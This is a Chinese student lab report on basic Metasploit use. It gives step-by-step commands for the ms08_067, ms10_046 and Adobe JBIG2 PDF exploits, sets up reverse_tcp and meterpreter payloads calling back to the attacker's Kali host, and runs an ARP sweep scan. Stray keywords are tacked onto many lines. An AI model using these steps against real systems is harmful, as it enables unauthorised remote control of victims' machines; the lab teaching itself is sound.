20145228《網絡對抗技術》MSF基礎應用

實驗內容

·掌握metasploit的基本應用方式,掌握經常使用的三種攻擊方式的思路shell

·(1)一個主動攻擊,如ms08_067;數據庫

(2)一個針對瀏覽器的攻擊,如ms11_050;windows

(3)一個針對客戶端的攻擊,如Adobeapi

(4)成功應用任何一個輔助模塊。瀏覽器

基礎問題回答

解釋什麼是exploit,payload,encode.安全

·exploit:至關於彈殼,將攻擊包傳輸到靶機。session

·payload: 抵達靶機後,執行攻擊方式tcp

·encode:對須要傳輸的文件進行編碼,使本身免殺學習

實驗過程

(1)ms08_067滲透攻擊

·kali進入msf編碼

·輸入search ms08_067後能夠找到滲透模塊

·而後輸入use exploit/windows/smb/ms08_067_netapi進入該模塊

·show payloads顯示有效的攻擊載荷

·show targets顯示能夠被攻擊的靶機操做系統型號

·set payload generic/shell_reverse_tcp設置有效攻擊載荷

·輸入set LHOST "kali Ip" set RHOST "Win xp Ip"設置並show options查看payload狀態。

·輸入exploit開始攻擊

·在kali上執行ipconfig/all

·在win xp上執行一樣的命令

(2)IE瀏覽器滲透攻擊——MS10046安全漏洞

·先利用search ms10_046查看可用攻擊模塊

·輸入命令use windows/browser/ms10_046_shortcut_icon_dllloader,進入該漏洞模塊。

·info查看信息:

·設置好參數並查看,這裏SRVHOST和LHOST都爲Kali的IP地址:

·開始執行,能夠看到生成了一個url

·在靶機的IE瀏覽器上使用該url進行訪問,在Kali上能夠看到

·使用sessions指令查看當前存在的會話,能夠看到存在一個ID爲1的會話:

·使用sessions -i 1選擇會話1

·獲取shell

(3)Adobe閱讀器滲透攻擊

·啓動msfconsole後輸入search adobe尋找可利用漏洞

·輸入use exploit/windows/fileformat/adobe_jbig2decode進入該漏洞模塊的使用

·使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷。

·設置參數
set FILENAME xxx.pdf

set LHOST "KALI Ip"

set LPORT xxxx

·輸入exploit,生成pdf文件

·並能夠看到pdf所在文件夾,將pdf複製到靶機裏。

·使用命令back退出當前模塊,並使用use exploit/multi/handler新建一個監聽模塊。

·使用set payload windows/meterpreter/reverse_tcp創建一個反向鏈接,並將參數設置爲攻擊模塊數據相同

·使用命令exploit開始攻擊,在xp中打開pdf,並用sysinfo查看靶機信息

·將進程遷移到explorer.exe.使用ps查看當前進程,並找到explorer.exe的進程號

·使用命令migrate 1884

·輸入shell,查看xp靶機信息

·在靶機xp中使用命令netstat -an,看本地tcp鏈接。

(4)MSF的掃描

·先建立一個msf所需的數據庫

·進入msf,輸入命令use auxiliary/scanner/discovery/arp_sweep進入模塊

·使用命令,設置
set interface eth0

set RHOSTS 172.30.1.0/21

set threads 2

·run開啓掃描,結果能夠看到除了本身主機的IP外,還有其餘ip

·能夠ping通,開啓nmap掃描,能夠看見開啓的端口號,以及目標機的操做系統

實驗收穫

本次實驗更加深刻理解了msf的使用,學習到了各類漏洞的尋找以及攻擊方式,對於之後防範這些攻擊有了基礎。

相關文章
相關標籤/搜索